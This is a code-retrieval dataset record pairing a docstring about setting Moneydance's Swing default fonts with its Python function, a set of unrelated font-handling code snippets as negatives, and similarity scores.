"0.53243834", "0.53237563", "0.53204346", "0.5320416", "0.5317315", "0.52973163", "0.5296111", "0.52936953", "0.52924025", "0.5287065", "0.5272165", "0.52716655", "0.5266562", "0.5263489", "0.52624", "0.52557206", "0.52557063" ]
0.8507626
0
Grabs the MD defaultText font, reduces default size down to below 18, sets UIManager defaults (if runtime extension, will probably error, so I catch and skip)
def setDefaultFonts(): if MD_REF_UI is None: return # If a runtime extension, then this may fail, depending on timing... Just ignore and return... try: myFont = MD_REF.getUI().getFonts().defaultText except: myPrint("B","ERROR trying to call .getUI().getFonts().defaultText - skipping setDefaultFonts()") return if myFont is None: myPrint("B","WARNING: In setDefaultFonts(): calling .getUI().getFonts().defaultText has returned None (but moneydance_ui was set) - skipping setDefaultFonts()") return if myFont.getSize()>18: try: myFont = myFont.deriveFont(16.0) myPrint("B", "I have reduced the font size down to point-size 16 - Default Fonts are now set to: %s" %(myFont)) except: myPrint("B","ERROR - failed to override font point size down to 16.... will ignore and continue. Font set to: %s" %(myFont)) else: myPrint("DB", "Attempting to set default font to %s" %myFont) try: UIManager.getLookAndFeelDefaults().put("defaultFont", myFont ) # https://thebadprogrammer.com/swing-uimanager-keys/ UIManager.put("CheckBoxMenuItem.acceleratorFont", myFont) UIManager.put("Button.font", myFont) UIManager.put("ToggleButton.font", myFont) UIManager.put("RadioButton.font", myFont) UIManager.put("CheckBox.font", myFont) UIManager.put("ColorChooser.font", myFont) UIManager.put("ComboBox.font", myFont) UIManager.put("Label.font", myFont) UIManager.put("List.font", myFont) UIManager.put("MenuBar.font", myFont) UIManager.put("Menu.acceleratorFont", myFont) UIManager.put("RadioButtonMenuItem.acceleratorFont", myFont) UIManager.put("MenuItem.acceleratorFont", myFont) UIManager.put("MenuItem.font", myFont) UIManager.put("RadioButtonMenuItem.font", myFont) UIManager.put("CheckBoxMenuItem.font", myFont) UIManager.put("OptionPane.buttonFont", myFont) UIManager.put("OptionPane.messageFont", myFont) UIManager.put("Menu.font", myFont) UIManager.put("PopupMenu.font", myFont) UIManager.put("OptionPane.font", myFont) UIManager.put("Panel.font", myFont) UIManager.put("ProgressBar.font", myFont) UIManager.put("ScrollPane.font", myFont) UIManager.put("Viewport.font", myFont) UIManager.put("TabbedPane.font", myFont) UIManager.put("Slider.font", myFont) UIManager.put("Table.font", myFont) UIManager.put("TableHeader.font", myFont) UIManager.put("TextField.font", myFont) UIManager.put("Spinner.font", myFont) UIManager.put("PasswordField.font", myFont) UIManager.put("TextArea.font", myFont) UIManager.put("TextPane.font", myFont) UIManager.put("EditorPane.font", myFont) UIManager.put("TabbedPane.smallFont", myFont) UIManager.put("TitledBorder.font", myFont) UIManager.put("ToolBar.font", myFont) UIManager.put("ToolTip.font", myFont) UIManager.put("Tree.font", myFont) UIManager.put("FormattedTextField.font", myFont) UIManager.put("IconButton.font", myFont) UIManager.put("InternalFrame.optionDialogTitleFont", myFont) UIManager.put("InternalFrame.paletteTitleFont", myFont) UIManager.put("InternalFrame.titleFont", myFont) except: myPrint("B","Failed to set Swing default fonts to use Moneydance defaults... sorry") myPrint("DB",".setDefaultFonts() successfully executed...") return
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _set_default_font(cls):\n if platform.system() == \"Linux\":\n for family in (\"DejaVu Sans\", \"Noto Sans\", \"Nimbus Sans\"):\n if family in tk.font.families():\n logger.debug(\"Setting default font to: '%s'\", family)\n tk.font.nametofont(\"TkDefaultFont\").configure(family=family)\n tk.font.nametofont(\"TkHeadingFont\").configure(family=family)\n tk.font.nametofont(\"TkMenuFont\").configure(family=family)\n break\n return tk.font.nametofont(\"TkDefaultFont\").configure()[\"family\"]", "def defaultFont(self, p_int=None): # real signature unknown; restored from __doc__ with multiple overloads\r\n pass", "def GetDefaultFont(self):\n return wx.Font(10, wx.MODERN, wx.NORMAL, wx.NORMAL)", "def loadDefaultFont(size):\n\n try:\n f = pygame.font.Font(None,size)\n except error, message:\n print \"Cannot load the default font\"\n raise SystemExit, message\n return f", "def set_font_size(*args):\n size = font_size.get()\n message_inp.configure(font=f'TKDefault {size}')", "def setHardwareFont():\n dislin.hwfont()", "def setTTFont(font='default'):\n if font == 'default':\n font = 'Times New Roman' \n dislin.winfnt(font)", "def test_configs_font(\n self):\n root = Tk()\n custom = font.Font(root, family='Helvetica', size=12)\n self.assertEqual(custom.cget('family'), 'Helvetica')\n fontSelect.font_style(custom, 'Times')\n self.assertEqual(custom.cget('family'), 'Times')\n fontSelect.font_size(custom, 18)\n self.assertEqual(custom.cget('size'), 18)", "def set_font_family_default(self):\n font = QFont('Arial', 12)\n self.parent.setCurrentFont(font)", "def __init__(self, font='mediumbold'):\n\tself.set_font(font)", "def base_font(self) -> str:\n pass", "def setDislinFont(font='default'):\n fontdict[font]()", "def get_default_font(bold=False):\n font = _QFont()\n font.setPointSize(FONT_SIZE)\n font.setBold(bold)\n return font", "def setFont(font='default',hardware=1):\n if font == 'default' and hardware:\n setHardwareFont()\n return\n currfmt = getFileFormat()\n if isPostscript(currfmt):\n setPSFont(font)\n elif isWMF(currfmt):\n setTTFont(font)\n else:\n setDislinFont(font)", "def get_text_font ( self, object ):\n return self.text_font", "def setup(theme='DarkAmber'):\r\n sg.theme(theme)\r\n\r\n headline_font = ('Arial bold', 20)\r\n font = ('Arial', 20)\r\n warning_font = ('Arial bold', 14)\r\n button_font = ('Arial', 14)\r\n\r\n return headline_font, font, warning_font, button_font", "def get_font_options(self): # real signature unknown; restored from __doc__\n pass", "def resetDefaults(self):\n self.client.SetFont(wx.Font(10,wx.SWISS,wx.NORMAL,wx.NORMAL))\n self.client.SetFontSizeAxis(10)\n self.client.SetFontSizeLegend(7)\n self.client.setLogScale((False,False))\n self.client.SetXSpec('auto')\n self.client.SetYSpec('auto')", "def fontDialog(*args, FontList: bool=True, scalable: bool=True, **kwargs)->AnyStr:\n pass", "def initDefaults(self):\n return _libsbml.TextGlyph_initDefaults(self)", "def set_font(self, font):\n\tself.m_font = font", "def load_font(fontSize):\n f1='/usr/share/fonts/corefonts/arialbd.ttf' \n f2='/usr/share/fonts/truetype/msttcorefonts/Arial_Bold.ttf'\n if os.path.isfile(f1): font=ImageFont.truetype(f1,fontSize)\n if os.path.isfile(f2): font=ImageFont.truetype(f2,fontSize)\n return font", "def adjusting_fonts(self):\n fix_x = int(0 * settings.scale)\n fix_y = int(0 * settings.scale)\n font_object = self.fontA\n box = self.box\n text_box = self.box.get_size()\n text_list = self.text.split()\n number_of_words = len(text_list)\n count = 0\n height = fix_y\n first = True\n line 
= \"\"\n line_break = False\n while count < number_of_words:\n line += text_list[count]\n line_size = font_object.size(line)\n line_pos = int((text_box[0] + fix_x - line_size[0]) / 2)\n if line_size[0] < text_box[0]:\n if count + 1 < number_of_words:\n temporary_line = line + \" \" + text_list[count + 1]\n if font_object.size(temporary_line)[0] >= text_box[0]:\n line_image = font_object.render(line, 1, self.color)\n height += int((line_size[1] * 0.8))\n box.blit(line_image, (line_pos, height))\n line = \"\"\n else:\n line += \" \"\n elif count + 1 == number_of_words:\n height += int((line_size[1] * 0.8))\n box.blit(\n font_object.render(line, 1, self.color), (line_pos, height)\n )\n else:\n line = text_list[count]\n height += int(\n line_size[1] * 0.8\n ) # If line height is perfect it does not seem that it is the same text\n count += 1", "def get_font_at_size(fonts_path, font_name, initial_font_size, text_to_print, target_width):\n font_size = initial_font_size\n while True:\n font = ImageFont.truetype(path.join(fonts_path, font_name), font_size)\n text_width = font.getsize(text_to_print)[0]\n if text_width <= target_width:\n break\n if font_size < 9:\n break\n font_size = font_size - 1\n return font", "def set_font(s: Optional[int] = 14, reset: Optional[bool] = False) -> None:\n if reset:\n plt.rcParams.update(plt.rcParamsDefault)\n plt.rcParams[\"figure.figsize\"] = [20, 10]\n # plt.rcParams['font.family'] = 'serif'\n # plt.rcParams['font.serif'] = ['Times New Roman'] + plt.rcParams['font.serif']\n plt.rc('font', size=s) # controls default text sizes\n plt.rc('axes', titlesize=s) # fontsize of the axes title\n plt.rc('axes', labelsize=s) # fontsize of the x and y labels\n plt.rc('xtick', labelsize=s - 2) # fontsize of the tick labels\n plt.rc('ytick', labelsize=s - 2) # fontsize of the tick labels\n plt.rc('legend', fontsize=s) # legend fontsize\n plt.rc('figure', titlesize=s + 2) # fontsize of the figure title", "def setCommonFonts(windows=None):\n f = setFont('fontNormal', family=cfgFontName, size=cfgFontSize)\n aliasFont('fontButton', 'fontNormal')\n fb = setFont('fontBold', family=cfgFontName, size=cfgFontSize, weight='bold')\n fi = setFont('fontItalic', family=cfgFontName, size=cfgFontSize, slant='italic')\n setFont('fontLabel', family=cfgFontName, size=cfgFontSize+1, weight='bold')\n if windows:\n windows.fontBig = tkFont.Font(size=cfgFontSize+2, family=cfgFontName, weight='bold')\n windows.font = f\n windows.fontBold = fb\n windows.fontItalic = fi", "def font(self):\n\treturn self.m_font", "def font(self):\n\treturn self.m_font", "def update_editor ( self ):\n super( TextFontEditor, self ).update_editor()\n set_font( self )", "def set_default(self):\n self.online()\n self.justify('L')\n self.inverse_off()\n self.double_height_off()\n self.set_line_height(30)\n self.bold_off()\n self.underline_off()\n self.set_barcode_height(50)\n self.set_size('s')\n self.set_charset(0)\n self.set_code_page(0)", "def _font(self):\n\treturn self.m_gdfont", "def adjust_matplotlib_settings():\n font = {\"weight\": \"bold\", \"size\": 22, \"family\": \"sans-serif\"}\n matplotlib.rc(\"font\", **font)\n matplotlib.rc(\"text\", usetex=True)\n matplotlib.rcParams[\"mathtext.fontset\"] = \"dejavusans\"", "def update_editor ( self ):\n font = self.factory.to_wx_font( self )\n try:\n self._facename.SetStringSelection( font.GetFaceName() )\n except:\n self._facename.SetSelection( 0 )\n try:\n self._point_size.SetStringSelection( str( font.GetPointSize() ) )\n except:\n self._point_size.SetSelection( 0 )\n 
font.SetPointSize( min( 10, font.GetPointSize() ) )\n self._font.SetValue( self.str_value )\n self._font.SetFont( font )", "def adjustTitleFont( self ):\n if ( self._titleFont ):\n return\n \n m = self.contentsMargins()\n w = self.rect().width() - (m[0] + m[2] + self.roundingRadius() * 2)\n \n if ( not w ):\n return\n \n font = QApplication.font()\n text = self.displayName()\n if not self.wordWrap() or projex.text.wordcount(text) == 1:\n metrics = QFontMetrics(font)\n \n while ( w < metrics.width(text) ):\n new_size = font.pointSize() - 1\n if ( new_size <= 5 ):\n break\n \n font.setPointSize(new_size)\n metrics = QFontMetrics(font)\n \n self._titleFont = font", "def setFontFallback(self,value):\n self.PDFreactorConfiguration.in1[\"fontFallback\"] = value", "def set_font_size():\n SMALLER_SIZE = 10\n MED_SIZE = 12\n BIG_SIZE = 18\n\n # plt.rc('font', size=SMALL_SIZE) # controls default text sizes\n plt.rc('axes', titlesize=MED_SIZE) # fontsize of the axes title\n plt.rc('axes', labelsize=MED_SIZE) # fontsize of the x and y labels\n plt.rc('xtick', labelsize=SMALLER_SIZE) # fontsize of the tick labels\n plt.rc('ytick', labelsize=SMALLER_SIZE) # fontsize of the tick labels\n plt.rc('legend', fontsize=MED_SIZE) # legend fontsize\n plt.rc('figure', titlesize=BIG_SIZE) # fontsize of the figure title", "def setX11Font(font='default', ending='STANDARD'):\n if font == 'default':\n font = '-Adobe-Times-Bold-R-Normal-' \n dislin.x11fnt(font,ending)", "def loadSystemFont(name, size):\n\n try:\n f = pygame.font.SysFont(name,size)\n except error, message:\n print \"Cannot load font: \", name\n raise SystemExit, message\n return f", "def init_text(self):\n d = self.declaration\n if d.text:\n self.set_text(d.text)\n if d.text_color:\n self.set_text_color(d.text_color)\n if d.text_alignment:\n self.set_text_alignment(d.text_alignment)\n if d.font_family or d.text_size:\n self.refresh_font()\n if hasattr(d, 'max_lines') and d.max_lines:\n self.set_max_lines(d.max_lines)", "def asNormal(self):\n\t\treturn TextFont( self.name[0:2], self.size)", "def main(argv):\n correct_font(*argv[1:])", "def set_default_style(self):\r\n self.font.setBold(False)\r\n self.setFont(self.font)\r\n self.setStyleSheet(\"\")\r\n self.show_tip()", "def set_fonts(cls, fonts={}):\n for font in fonts:\n if font not in cls._fonts:\n cls._fonts[font] = _Font()\n cls._fonts[font].replace(cls._create_font(fonts[font], 16))\n\n if not cls._fonts[\"widget\"]:\n cls._fonts[\"widget\"].replace(cls._create_font(\"Arial\", 16))\n if not cls._fonts[\"title\"]:\n name = fonts[\"widget\"] if (\"widget\" in fonts) else \"Arial\"\n cls._fonts[\"title\"].replace(cls._create_font(name, 30))\n if not cls._fonts[\"mono\"]:\n cls._fonts[\"mono\"].replace(cls._create_font(\n \"Ubuntu Mono, FreeMono, Monospace\", 16))\n\n #if SCREEN._opengl:\n # cls.mono_w = cls[\"mono\"].font.Advance(\"e\")\n #else:\n cls.mono_w = cls[\"mono\"].render(\"e\", False, (0,0,0)).get_width()", "def update_editor ( self ):\n super( SimpleFontEditor, self ).update_editor()\n set_font( self )", "def get_text_font ( self, object ):\n if self._is_selected( object ):\n return self.selected_text_font\n return self.text_font", "def SetMeasuringFont(self, font):\r\n\r\n self.GetArtProvider().SetMeasuringFont(font)", "def setFont(fontKey, update=False, **opts):\n if not hasFont(fontKey) or update:\n globals()[fontKey] = tkFont.Font(**opts)\n \n return globals()[fontKey]", "def askopenfont(self, *args, **kw):\n\n self.tk.tk_setPalette('#888888')\n save_update_step = self.update_step\n 
self.update_step = 0\n\n filename = tkinter.filedialog.askopenfilename(parent=self.tk)\n if filename:\n self.readwtf(filename)\n self.redraw_letters()\n self.update_step = save_update_step\n self.tk.tk_setPalette('#000000')", "def rec_default(self):\n self.shrink_wrap_triggers.setText('(1,1)')\n self.shrink_wrap_type.setText('GAUSS')\n self.sigma.setText('1.0')\n self.threshold.setText('0.1')", "def getfont(self):\r\n if self.font is None:\r\n self.font = cv2.FONT_HERSHEY_SIMPLEX\r\n return self.font", "def test_calls_config(\n self, mock_font):\n root = Tk()\n custom = mock_font(root, family='Helvetica', size=12)\n fontSelect.font_style(custom, 'Times')\n custom.config.assert_called_with(family='Times')", "def setFont(self, font):\n self.edit.document().setDefaultFont(font)\n self.edit.setFont(font)\n super(BaseConsole, self).setFont(font)", "def _get_font_descriptor(self) -> dict:\n self._base_font = self.font['name'].names[6].toStr()\n head = self.font[\"head\"]\n self.units_per_em = head.unitsPerEm\n scale = 1000 / self.units_per_em\n xMax = head.xMax * scale\n xMin = head.xMin * scale\n yMin = head.yMin * scale\n yMax = head.yMax * scale\n\n hhea = self.font.get('hhea')\n\n if hhea:\n ascent = hhea.ascent * scale\n descent = hhea.descent * scale\n\n os2 = self.font.get('OS/2')\n\n if os2:\n usWeightClass = os2.usWeightClass\n fsType = os2.fsType\n if (fsType == 0x0002 or (fsType & 0x0300) != 0):\n error = 'Font file in {} has copyright restrictions.'\n raise Exception(error.format(self.filename))\n\n if hhea is None:\n ascent = os2.sTypoAscender * scale\n descent = os2.sTypoDescender * scale\n capHeight = os2.sCapHeight * scale if os2.version > 1 else ascent\n else:\n usWeightClass = 500\n if hhea is None:\n ascent = yMax\n descent = yMin\n capHeight = self.ascent\n\n stemV = 50 + int(pow((usWeightClass / 65.0),2))\n\n post = self.font['post']\n italicAngle = post.italicAngle\n\n flags = 4\n if (italicAngle!= 0):\n flags = flags | 64\n if (usWeightClass >= 600):\n flags = flags | 262144\n if (post.isFixedPitch):\n flags = flags | 1\n\n return {\n 'Type': b'/FontDescriptor',\n 'FontName': subs('/{}', self.base_font),\n 'Flags': flags,\n 'FontBBox': [xMin, yMin, xMax, yMax],\n 'ItalicAngle': italicAngle,\n 'Ascent': ascent,\n 'Descent': descent,\n 'CapHeight': capHeight,\n 'StemV': stemV\n }", "def set_font(self, font):\n this.font = font\n # Signal to the application that we need a resize\n this.chsize()", "def update_editor ( self ):\n super( ReadonlyFontEditor, self ).update_editor()\n set_font( self )", "def set_font(self, font, option):\n # Update fonts in all plugins\n set_font(font, option=option)\n plugins = self.main.widgetlist + self.main.thirdparty_plugins\n for plugin in plugins:\n plugin.update_font()", "def get_font(self, option):\n return get_font(option=option)", "def font(size=20, name=None):\n name = name or \"regular\"\n path = ROOT_DIR / \"wclib\" / \"assets\" / (name + \".ttf\")\n return pygame.font.Font(path, size)", "def parse_fontsize(size=None, default=None):\n if size is not None:\n return size\n elif _is_default_matplotlibrc():\n return default\n else:\n return None", "def set_fontsizes(sizes=None):\n if sizes is None:\n SMALL_SIZE = 8\n MEDIUM_SIZE = 10\n BIGGER_SIZE = 12\n elif isinstance(sizes, int):\n SMALL_SIZE = sizes\n MEDIUM_SIZE = sizes\n BIGGER_SIZE = sizes\n else:\n SMALL_SIZE = sizes[0]\n MEDIUM_SIZE = sizes[1]\n BIGGER_SIZE = sizes[2]\n\n plt.rc('font', size=SMALL_SIZE) # controls default text sizes\n plt.rc('axes', titlesize=SMALL_SIZE) # 
fontsize of the axes title\n plt.rc('axes', labelsize=MEDIUM_SIZE) # fontsize of the x and y labels\n plt.rc('xtick', labelsize=SMALL_SIZE) # fontsize of the tick labels\n plt.rc('ytick', labelsize=SMALL_SIZE) # fontsize of the tick labels\n plt.rc('legend', fontsize=SMALL_SIZE) # legend fontsize\n plt.rc('figure', titlesize=BIGGER_SIZE) # fontsize of the figure title", "def initialize():\n #carga las fuente del usuario\n for family in USER_FONTS:\n for font in USER_FONTS[family]:\n name, path = USER_FONTS[family][font]\n pdfmetrics.registerFont(TTFont(name, path))", "def shell_font_changed(self, font):\n self.set_font(font)", "def render_defaults(stdscr):\n max_y = stdscr.getmaxyx()[0] - 1\n if superglobals.information_enabled:\n stdscr.addstr(0, 0, uname().system)\n stdscr.addstr(1, 0, uname().machine)\n \n for i in range(0, max_y + 1):\n stdscr.addstr(i, 43, \"│\") # Barrier that protects program from user input.", "def setupStyling(self):\n\n\t\tfaces = {\n\t\t\t'times': 'Times New Roman',\n\t\t\t'mono' : 'Courier New',\n\t\t\t'helv' : 'Arial',\n\t\t\t'other': 'Comic Sans MS',\n\t\t\t'size' : 10,\n\t\t\t'size2': 8,\n\t\t}\n\n\t\tself.edit.StyleSetSpec(stc.STC_STYLE_DEFAULT, \"back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleClearAll()\n\t\tself.edit.StyleSetSpec(stc.STC_STYLE_LINENUMBER, \"fore:#928374,back:#212121,face:%(mono)s,size:%(size2)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.TEXT, \"fore:#d5c4a1,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.HEADING, \"fore:#EFCD1E,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.HIDDEN, \"fore:#d5c4a1,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.CODE, \"fore:#b8bb26,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.SYMBOL, \"fore:#81ac71,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.TEST, \"fore:#ff00ff,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.STRIKE, \"fore:#e44533,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.BOLD, \"fore:#d9a62e,bold,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.UNDERLINE, \"fore:#d9a62e,underline,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.ITALIC, \"fore:#7d9d90,italic,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.IMAGE, \"fore:#cb8296,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.IMAGE_UNDERLINED, \"fore:#cb8296,underline,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.LINK, \"fore:#cb8296,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.LINK_UNDERLINED, \"fore:#cb8296,underline,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.HTML, \"fore:#cb8296,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.HTML_ATTRIBUTE, \"fore:#d9a62e,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.FORMAT, \"fore:#e44533,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.COMMENT, \"fore:#928372,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\n\t\tself.edit.StyleSetSpec(STYLE.CODEBLOCK_KEYWORD, \"fore:#569cd6,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.CODEBLOCK_SYMBOL, \"fore:#9cdcfe,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.CODEBLOCK_TEXT, \"fore:#F9FFE0,back:#282828,face:%(mono)s,size:%(size)d\" % 
faces)\n\t\tself.edit.StyleSetSpec(STYLE.CODEBLOCK_STRING, \"fore:#d69d73,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.CODEBLOCK_COMMENT, \"fore:#57a64a,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.CODEBLOCK_FUNCTION, \"fore:#4ec9b0,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.CODEBLOCK_CLASS, \"fore:#4ec9b0,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.CODEBLOCK_TYPE, \"fore:#EFCD1E,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.CODEBLOCK_FLOW, \"fore:#d8a0df,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.CODEBLOCK_DIGIT, \"fore:#b5ce92,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.IndicatorSetStyle(0, stc.STC_INDIC_SQUIGGLE)\n\t\tself.edit.IndicatorSetForeground(0, wx.RED)", "def system_font_demo(my_canvas, fonts):\n pos_y = 750\n for font in fonts:\n try:\n ttf = TTFont(font, fonts[font])\n except:\n # Skip this font\n continue\n\n pdfmetrics.registerFont(ttf)\n\n my_canvas.setFont(font, 12)\n my_canvas.drawString(30, pos_y, font)\n pos_y -= 10\n if pos_y < 40:\n my_canvas.showPage()\n pos_y = 750", "def font(self):\n return self[\"font\"]", "def font(self):\n return self[\"font\"]", "def font(self):\n return self[\"font\"]", "def selectFont():\n font,ok = QtGui.QFontDialog.getFont()\n if ok:\n return font\n else:\n return None", "def getFontFromParams(self,\n family: str, size: str, slant: str, weight: str, defaultSize: int = 12, tag = '',\n ) -> Any:\n if isinstance(size, str):\n if size.endswith('pt'):\n size = size[:-2].strip()\n elif size.endswith('px'):\n if size not in self.size_warnings:\n self.size_warnings.append(size)\n g.es(f\"px ignored in font setting: {size}\")\n size = size[:-2].strip()\n try:\n i_size = int(size)\n except Exception:\n i_size = 0\n if i_size < 1:\n i_size = defaultSize\n d = {\n 'black': Weight.Black,\n 'bold': Weight.Bold,\n 'demibold': Weight.DemiBold,\n 'light': Weight.Light,\n 'normal': Weight.Normal,\n }\n weight_val = d.get(weight.lower(), Weight.Normal)\n italic = slant == 'italic'\n if not family:\n family = 'DejaVu Sans Mono'\n try:\n font = QtGui.QFont(family, i_size, weight_val, italic)\n if sys.platform.startswith('linux'):\n try:\n font.setHintingPreference(font.PreferFullHinting)\n except AttributeError:\n pass\n return font\n except Exception:\n g.es_print(\"exception setting font\", g.callers(4))\n g.es_print(\n f\"family: {family}\\n\"\n f\" size: {i_size}\\n\"\n f\" slant: {slant}\\n\"\n f\"weight: {weight}\")\n # g.es_exception() # Confusing for most users.\n return None", "def set_matplotlib_font_size(SMALL_SIZE = 8, MEDIUM_SIZE = 10, BIGGER_SIZE = 12):\n\n plt.rc('font', size=SMALL_SIZE) # controls default text sizes\n plt.rc('axes', titlesize=SMALL_SIZE) # fontsize of the axes title\n plt.rc('axes', labelsize=MEDIUM_SIZE) # fontsize of the x and y labels\n plt.rc('xtick', labelsize=SMALL_SIZE) # fontsize of the tick labels\n plt.rc('ytick', labelsize=SMALL_SIZE) # fontsize of the tick labels\n plt.rc('legend', fontsize=SMALL_SIZE) # legend fontsize\n plt.rc('figure', titlesize=BIGGER_SIZE) # fontsize of the figure title", "def _create_font(cls, font, size):\n if font[-4:] in (\".ttf\", \".otf\"):\n return pygame.font.Font(font, size)\n else:\n return pygame.font.SysFont(font, size)", "def setPSFont(font='default'):\n if font == 'default':\n font = 'Times-Roman'\n 
dislin.psfont(font)", "def largest_font_that_fits(draw, font_file, text, cover_width):\n text_w = cover_width + 1\n font_size = 110\n padding = 20\n while(text_w + padding > cover_width):\n font_size -= 10\n font = ImageFont.truetype(font_file, font_size)\n text_w, text_h = draw.textsize(text, font)\n return font", "def seq_display_settings(self):\n # Open a new window for setting the restriction enzymes\n\n self.seq_display_setupwin=Toplevel()\n self.seq_display_setupwin.geometry('+300+450')\n self.seq_display_setupwin.title('Sequence Display Setup')\n\n # Spacing between bases\n row=1\n lblspace=Label(self.seq_display_setupwin,text='Bases Spacing:')\n lblspace.grid(row=row,column=0,padx=3,pady=2)\n bscaleentry=Scale(self.seq_display_setupwin,from_=8,to=20,resolution=1,orient='horizontal',\n relief='ridge',variable=self.base_scale,label='scale factor')\n bscaleentry.grid(row=row,column=1, sticky='wens', padx=3,pady=2)\n row=2\n lblfont=Label(self.seq_display_setupwin,text='Seq Font:')\n lblfont.grid(row=row,column=0,padx=3,pady=2)\n fontentry_button=Menubutton(self.seq_display_setupwin,textvariable=self.seqfont,\n\t\t\t\t\trelief=RAISED,width=16)\n restr_fontentry_button=Menubutton(self.seq_display_setupwin,textvariable=self.restr_font,\n\t\t\t\t\trelief=RAISED,width=16)\n fontentry_menu=Menu(fontentry_button,tearoff=0)\n restr_fontentry_menu=Menu(restr_fontentry_button,tearoff=0)\n fontentry_button['menu']=fontentry_menu\n restr_fontentry_button['menu']=restr_fontentry_menu\n\n # Other fonts available\n fts=['Arial','Courier','Verdana','Fixed','Times']\n for text in fts:\n #text='Font '+text\n fontentry_menu.add_radiobutton(label=text,\n variable=self.seqfont,\n value=text,\n indicatoron=1)\n restr_fontentry_menu.add_radiobutton(label=text,\n variable=self.restr_font,\n value=text,\n indicatoron=1)\n fontentry_button.grid(row=row,column=1, sticky='nes', padx=3,pady=2)\n\n row=3\n lblfontsize=Label(self.seq_display_setupwin,text='Sequence Font Size:')\n lblfontsize.grid(row=row,column=0,padx=3,pady=2)\n fontsizeentry=Scale(self.seq_display_setupwin,from_=8,to=20,resolution=1,orient='horizontal',\n relief='ridge',variable=self.seqfontsize)\n\n fontsizeentry.grid(row=row,column=1, sticky='wens',padx=3,pady=2)\n row=4\n frame = Frame(self.seq_display_setupwin)\n fontstyle_label = Label(frame, text='Font Style:')\n fontstyle_label.grid(row=0,column=0)\n fontstyle = Radiobutton(frame, text=\"plain\", variable=self.fontstyle, value=0)\n fontstyle1 = Radiobutton(frame, text=\"bold\", variable=self.fontstyle, value=1)\n fontstyle2 = Radiobutton(frame, text=\"italic\", variable=self.fontstyle, value=2)\n fontstyle.grid(row=0,column=1)\n fontstyle1.grid(row=0,column=2)\n fontstyle2.grid(row=0,column=3)\n frame.grid(row=row,column=0,columnspan=2,sticky='news', padx=3,pady=2)\n\n row=5\n self.backgrcolorbutton = Button(self.seq_display_setupwin, text='background color',\n bg=self.backgrcolor.get(),\n command=self.setbackgrcolor)\n self.backgrcolorbutton.grid(row=row,column=1, sticky='nes', padx=3,pady=2)\n row=6\n restrfont=Label(self.seq_display_setupwin,text='Restr. 
Site Font:')\n restrfont.grid(row=row,column=0,padx=3,pady=2)\n restr_fontentry_button.grid(row=row,column=1, sticky='nes', padx=3,pady=2)\n row=7\n\n # Apply Button\n b = Button(self.seq_display_setupwin, text=\"Apply Settings\", command=self.update_window_formatting)\n b.grid(row=row,column=1,sticky='wens',padx=4,pady=4)\n\n # Close button\n c=Button(self.seq_display_setupwin,text='Close',command=self.close_seq_display_setupwin)\n c.grid(row=row,column=0,sticky='wens',padx=4,pady=4)\n\n # Save Settings button\n row=8\n c=Button(self.seq_display_setupwin,text='Save as Default',command=self.save_preferences)\n c.grid(row=row,column=0,columnspan=2,sticky='wens',padx=4,pady=4)\n return", "def initDefaults(self):\n return _libsbml.GeneralGlyph_initDefaults(self)", "def generate_fonts_doc() -> None:\n text = 'pygame menu'\n save_font_image(pygame_menu.font.FONT_8BIT, text, '_static/font_8bit.png')\n save_font_image(pygame_menu.font.FONT_BEBAS, text, '_static/font_bebas.png')\n save_font_image(pygame_menu.font.FONT_COMIC_NEUE, text, '_static/font_comic_neue.png')\n save_font_image(pygame_menu.font.FONT_DIGITAL, text, '_static/font_digital.png')\n save_font_image(pygame_menu.font.FONT_FIRACODE, text, '_static/font_firacode.png')\n save_font_image(pygame_menu.font.FONT_FIRACODE_BOLD, text, '_static/font_firacode_bold.png')\n save_font_image(pygame_menu.font.FONT_FIRACODE_BOLD_ITALIC, text, '_static/font_firacode_bold_italic.png')\n save_font_image(pygame_menu.font.FONT_FIRACODE_ITALIC, text, '_static/font_firacode_italic.png')\n save_font_image(pygame_menu.font.FONT_FRANCHISE, text, '_static/font_franchise.png')\n save_font_image(pygame_menu.font.FONT_HELVETICA, text, '_static/font_helvetica.png')\n 